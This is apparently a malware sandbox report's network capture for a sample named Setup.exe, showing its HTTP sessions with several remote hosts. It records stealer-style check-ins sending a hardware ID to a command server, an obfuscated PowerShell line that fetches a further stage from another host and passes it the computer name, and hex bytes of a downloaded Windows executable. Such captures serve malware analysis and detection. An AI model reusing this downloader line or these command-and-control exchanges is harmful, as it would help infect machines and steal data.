                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-01 18:04:15 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=JMD9W24D8L9AG
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1237
                                                                                                                                                                                                                                                            Host: abberanteusz.click
                                                                                                                                                                                                                                                            2025-01-01 18:04:15 UTC1237OUTData Raw: 2d 2d 4a 4d 44 39 57 32 34 44 38 4c 39 41 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 35 30 44 42 46 34 45 36 34 32 45 46 32 32 43 38 45 34 33 37 35 44 34 38 41 35 31 39 31 36 0d 0a 2d 2d 4a 4d 44 39 57 32 34 44 38 4c 39 41 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 4d 44 39 57 32 34 44 38 4c 39 41 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 4a 4d 44 39 57 32 34 44 38 4c 39 41 47
                                                                                                                                                                                                                                                            Data Ascii: --JMD9W24D8L9AGContent-Disposition: form-data; name="hwid"6C50DBF4E642EF22C8E4375D48A51916--JMD9W24D8L9AGContent-Disposition: form-data; name="pid"1--JMD9W24D8L9AGContent-Disposition: form-data; name="lid"hRjzG3--GAS--JMD9W24D8L9AG
                                                                                                                                                                                                                                                            2025-01-01 18:04:16 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:16 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=33cso8pe8so0liiu8cl2936iei; expires=Sun, 27 Apr 2025 11:50:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZIz3ZrgU36%2BTFOlSK6BrW3%2FH0f5QQDMrf4VKaAChPmXHGRgHjkCwo2abo8jBRMIBMQXYuHZZqOmQ0dDgcpLliYzJlVWMMBPPSQ8FJmGZyQpCF9HcEjvEp5%2B7QWO7H5HK1shYmCk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e466ddb41c1-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2229&min_rtt=2227&rtt_var=840&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2151&delivery_rate=1299510&cwnd=205&unsent_bytes=0&cid=023f2f38703ceb13&ts=489&x=0"
                                                                                                                                                                                                                                                            2025-01-01 18:04:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2025-01-01 18:04:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            6192.168.2.449741172.67.198.1024437316C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-01 18:04:17 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=51VOM22OB4VHWV7
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1078
                                                                                                                                                                                                                                                            Host: abberanteusz.click
                                                                                                                                                                                                                                                            2025-01-01 18:04:17 UTC1078OUTData Raw: 2d 2d 35 31 56 4f 4d 32 32 4f 42 34 56 48 57 56 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 35 30 44 42 46 34 45 36 34 32 45 46 32 32 43 38 45 34 33 37 35 44 34 38 41 35 31 39 31 36 0d 0a 2d 2d 35 31 56 4f 4d 32 32 4f 42 34 56 48 57 56 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 31 56 4f 4d 32 32 4f 42 34 56 48 57 56 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 35 31 56 4f 4d 32 32
                                                                                                                                                                                                                                                            Data Ascii: --51VOM22OB4VHWV7Content-Disposition: form-data; name="hwid"6C50DBF4E642EF22C8E4375D48A51916--51VOM22OB4VHWV7Content-Disposition: form-data; name="pid"1--51VOM22OB4VHWV7Content-Disposition: form-data; name="lid"hRjzG3--GAS--51VOM22
                                                                                                                                                                                                                                                            2025-01-01 18:04:17 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=c9bfcito1s8lnvqffrmls89cmv; expires=Sun, 27 Apr 2025 11:50:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmOLhvfPHrhx07DBX4jTiKuEplqZVO9rjpQxFgmM3HPckfJ3LJ6AcsmaUU6IVv%2FeewMp64hPB8OTdf6VXpohZC%2BopapOl2lK7g1LUF0tRhI729%2FICOPGrObEfIn%2FK5%2FhmHDeWYU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e4ee8cd726e-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2053&min_rtt=2048&rtt_var=778&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1994&delivery_rate=1397797&cwnd=224&unsent_bytes=0&cid=5eee75af1566dea9&ts=531&x=0"
                                                                                                                                                                                                                                                            2025-01-01 18:04:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2025-01-01 18:04:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            7192.168.2.449743172.67.198.1024437316C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-01 18:04:18 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 112
                                                                                                                                                                                                                                                            Host: abberanteusz.click
                                                                                                                                                                                                                                                            2025-01-01 18:04:18 UTC112OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 36 43 35 30 44 42 46 34 45 36 34 32 45 46 32 32 43 38 45 34 33 37 35 44 34 38 41 35 31 39 31 36
                                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=6C50DBF4E642EF22C8E4375D48A51916
                                                                                                                                                                                                                                                            2025-01-01 18:04:18 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:18 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=feoo4svc8jp9em7glpb539qpcj; expires=Sun, 27 Apr 2025 11:50:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Krp%2FLX%2BYMCQ%2BVfopEwQrPI2vtfc2jAzYXp5moByjb9ZW0iTVub4a8Zw9%2FCjJaWwTVR7z3SCRl6hUnV68OjIp1NQ8V8BgNFx%2F%2FWZzHvdhzk9aHaXMJxSFUpybr8qEFOjiwFH%2F720%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e5599fa43b6-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1632&rtt_var=816&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4228&recv_bytes=1015&delivery_rate=160404&cwnd=224&unsent_bytes=0&cid=0cae9e0ac9986542&ts=552&x=0"
                                                                                                                                                                                                                                                            2025-01-01 18:04:18 UTC218INData Raw: 64 34 0d 0a 30 44 34 64 41 63 7a 6f 38 4b 6a 54 4b 7a 31 2b 61 53 4f 39 30 58 75 71 5a 73 58 4d 55 58 4b 6c 4c 69 51 46 61 37 53 48 30 72 53 4c 52 54 39 30 37 74 4c 53 77 4b 64 66 54 51 31 54 66 35 4b 4e 56 4d 6b 44 6f 72 6c 2f 41 63 31 42 56 46 6c 45 6a 4c 4c 6c 67 4f 49 49 4c 7a 58 34 33 71 79 48 6f 30 4d 54 43 68 46 58 6e 2f 31 5a 7a 42 4c 6e 39 6d 4e 65 68 30 73 47 50 31 72 4a 71 36 6d 57 70 52 77 6e 49 36 53 63 68 4e 69 67 45 57 46 52 4e 51 7a 57 76 52 4c 61 45 4c 43 68 4f 41 48 51 52 77 70 32 41 39 76 33 6a 70 75 35 55 47 6c 65 72 34 53 41 39 36 42 44 58 46 41 64 57 38 6e 7a 56 34 67 41 73 65 35 72 51 6f 6b 4d 51 53 64 52 68 50 71 50 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: d40D4dAczo8KjTKz1+aSO90XuqZsXMUXKlLiQFa7SH0rSLRT907tLSwKdfTQ1Tf5KNVMkDorl/Ac1BVFlEjLLlgOIILzX43qyHo0MTChFXn/1ZzBLn9mNeh0sGP1rJq6mWpRwnI6SchNigEWFRNQzWvRLaELChOAHQRwp2A9v3jpu5UGler4SA96BDXFAdW8nzV4gAse5rQokMQSdRhPqP
                                                                                                                                                                                                                                                            2025-01-01 18:04:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            8192.168.2.449744185.161.251.214437316C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-01 18:04:19 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Host: cegu.shop
                                                                                                                                                                                                                                                            2025-01-01 18:04:19 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.26.2
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:19 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 329
                                                                                                                                                                                                                                                            Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            ETag: "676c9e2a-149"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            2025-01-01 18:04:19 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                                                                                                                            Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            9192.168.2.449745104.21.37.1284437316C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-01 18:04:20 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Host: klipvumisui.shop
                                                                                                                                                                                                                                                            2025-01-01 18:04:20 UTC908INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:20 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 8767044
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                                                                                                                            Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CKZlM2C4C6K1gT6j%2Fhm3oaTPjYLme%2FoEl1xPJdGhTG1pDaeudKbw4KsuSwvVe%2FBJsgHbeIAaHASA3bNODhY%2FPebJEjEgm%2BsTThPmgICNvNYrwJXtouM9r%2Ba3QGZ52Rm7V2TQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e634bc7434a-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6526&min_rtt=1651&rtt_var=3672&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2868&recv_bytes=820&delivery_rate=1768625&cwnd=228&unsent_bytes=0&cid=db08ea884558f3b1&ts=310&x=0"
                                                                                                                                                                                                                                                            2025-01-01 18:04:20 UTC1369INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                                                                                            2025-01-01 18:04:20 UTC1369INData Raw: 09 4e 61 74 69 76 65 49 6e 74 04 00 00 00 80 ff ff ff 7f 02 00 00 00 74 11 40 00 01 0a 4e 61 74 69 76 65 55 49 6e 74 05 00 00 00 00 ff ff ff ff 02 00 00 90 11 40 00 04 06 53 69 6e 67 6c 65 00 02 00 00 a0 11 40 00 04 08 45 78 74 65 6e 64 65 64 02 02 00 00 00 00 b4 11 40 00 04 06 44 6f 75 62 6c 65 01 02 00 00 c4 11 40 00 04 04 43 6f 6d 70 03 02 00 00 00 00 d4 11 40 00 04 08 43 75 72 72 65 6e 63 79 04 02 00 00 00 00 e8 11 40 00 05 0b 53 68 6f 72 74 53 74 72 69 6e 67 ff 02 00 fc 11 40 00 14 09 50 41 6e 73 69 43 68 61 72 30 10 40 00 02 00 00 00 00 14 12 40 00 14 09 50 57 69 64 65 43 68 61 72 4c 10 40 00 02 00 00 00 00 2c 12 40 00 03 08 42 79 74 65 42 6f 6f 6c 00 00 00 00 80 ff ff ff 7f 28 12 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00
                                                                                                                                                                                                                                                            Data Ascii: NativeIntt@NativeUInt@Single@Extended@Double@Comp@Currency@ShortString@PAnsiChar0@@PWideCharL@,@ByteBool(@FalseTrueSystem
                                                                                                                                                                                                                                                            2025-01-01 18:04:20 UTC1369INData Raw: 00 02 00 0b 28 9c 4a 00 0c 26 6f 70 5f 4c 65 73 73 54 68 61 6e 00 00 00 10 40 00 02 12 98 15 40 00 04 4c 65 66 74 02 00 12 98 15 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 13 26 6f 70 5f 4c 65 73 73 54 68 61 6e 4f 72 45 71 75 61 6c 00 00 00 10 40 00 02 12 98 15 40 00 04 4c 65 66 74 02 00 12 98 15 40 00 05 52 69 67 68 74 02 00 02 00 7c 17 40 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 1f 40 00 00 00 00 00 7c 17 40 00 00 00 00 00 92 18 40 00 08 00 00 00 00 00 00 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 22 00 9a 18 40 00 44 00 f4 ff c0 18 40 00 42 00 f4 ff e4 18 40 00 42 00 f4 ff 0d 19 40 00 43 00 f4 ff 4b 19 40 00 42 00 f4 ff 7a 19 40 00 42 00 f4 ff a3
                                                                                                                                                                                                                                                            Data Ascii: (J&op_LessThan@@Left@Right(J&op_LessThanOrEqual@@Left@Right|@@|@@~@@@@@@@@}@}@}@"@D@B@B@CK@Bz@B
                                                                                                                                                                                                                                                            2025-01-01 18:04:20 UTC1369INData Raw: 41 64 64 72 65 73 73 03 00 00 11 40 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 04 4e 61 6d 65 02 00 02 00 46 00 04 7f 40 00 0c 47 65 74 49 6e 74 65 72 66 61 63 65 03 00 00 10 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 12 40 13 40 00 01 00 03 49 49 44 02 00 20 00 00 00 00 02 00 03 4f 62 6a 02 00 02 00 3e 00 68 7f 40 00 11 47 65 74 49 6e 74 65 72 66 61 63 65 45 6e 74 72 79 03 00 a0 14 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 40 13 40 00 01 00 03 49 49 44 02 00 02 00 31 00 28 9c 4a 00 11 47 65 74 49 6e 74 65 72 66 61 63 65 54 61 62 6c 65 03 00 2c 15 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 ac 7f 40 00 08 55 6e 69 74 4e 61 6d 65 03 00 b8 12 40 00 08 00 02 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: Address@@Self@NameF@GetInterface@@Self@@IID Obj>h@GetInterfaceEntry@Self@@IID1(JGetInterfaceTable,@Self3@UnitName@
                                                                                                                                                                                                                                                            2025-01-01 18:04:20 UTC1369INData Raw: 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 00 00 00 00 0f 55 6e 73 61 66 65 41 74 74 72 69 62 75 74 65 00 00 94 21 40 00 07 0f 55 6e 73 61 66 65 41 74 74 72 69 62 75 74 65 78 21 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 18 22 40 00 00 00 00 00 00 00 00 00 00 00 00 00 34 22 40 00 00 00 00 00 18 22 40 00 00 00 00 00 1e 22 40 00 08 00 00 00 c4 1f 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 00 00 00 00 11 56 6f 6c 61 74 69 6c 65 41 74 74 72 69 62 75 74 65 34 22 40 00 07 11 56 6f 6c 61 74 69 6c 65 41 74 74 72 69 62 75 74 65 18 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 b8 22 40
                                                                                                                                                                                                                                                            Data Ascii: @@}@}@}@UnsafeAttribute!@UnsafeAttributex!@4 @System"@4"@"@"@@~@@@@@@@@}@}@}@VolatileAttribute4"@VolatileAttribute"@4 @System"@
                                                                                                                                                                                                                                                            2025-01-01 18:04:20 UTC1369INData Raw: 74 02 00 02 00 09 e8 89 40 00 08 50 75 6c 73 65 41 6c 6c 00 00 00 00 00 00 01 0a 9c 1f 40 00 07 41 4f 62 6a 65 63 74 02 00 02 00 ec 26 40 00 0f 0a 49 49 6e 74 65 72 66 61 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 20 27 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 e8 26 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65 6d 01 00 ff ff 02 00 00 54 27 40 00 0f 09 49 44 69 73 70 61 74 63 68 e8 26 40 00 01 00 04 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 04 00 ff ff 02 00 00 00 00 cc 83 44 24 04 f8 e9 81 ca 00 00 83 44 24 04 f8 e9 9f ca 00 00 83 44 24 04 f8 e9 b1 ca 00 00 cc 85 27 40 00 8f 27 40 00 99 27 40 00 01 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: t@PulseAll@AObject&@IInterfaceFSystem '@IEnumerable&@SystemT'@IDispatch&@FSystemD$D$D$'@'@'@
                                                                                                                                                                                                                                                            2025-01-01 18:04:20 UTC1369INData Raw: 6f 75 6e 74 02 00 cc 10 40 00 02 00 00 00 02 05 46 6c 61 67 73 02 00 9c 10 40 00 04 00 00 00 02 0b 45 6c 65 6d 65 6e 74 53 69 7a 65 02 00 9c 10 40 00 08 00 00 00 02 09 4c 6f 63 6b 43 6f 75 6e 74 02 00 00 11 40 00 0c 00 00 00 02 04 44 61 74 61 02 00 a8 2b 40 00 10 00 00 00 02 06 42 6f 75 6e 64 73 02 00 02 00 00 00 00 84 2c 40 00 0e 0a 54 56 61 72 52 65 63 6f 72 64 08 00 00 00 00 00 00 00 00 02 00 00 00 00 11 40 00 00 00 00 00 02 07 50 52 65 63 6f 72 64 02 00 00 11 40 00 04 00 00 00 02 07 52 65 63 49 6e 66 6f 02 00 02 00 00 00 00 cc 2c 40 00 0e 08 54 56 61 72 44 61 74 61 10 00 00 00 00 00 00 00 00 20 00 00 00 cc 10 40 00 00 00 00 00 02 05 56 54 79 70 65 02 00 cc 10 40 00 02 00 00 00 02 09 52 65 73 65 72 76 65 64 31 02 00 cc 10 40 00 04 00 00 00 02 09 52 65
                                                                                                                                                                                                                                                            Data Ascii: ount@Flags@ElementSize@LockCount@Data+@Bounds,@TVarRecord@PRecord@RecInfo,@TVarData @VType@Reserved1@Re
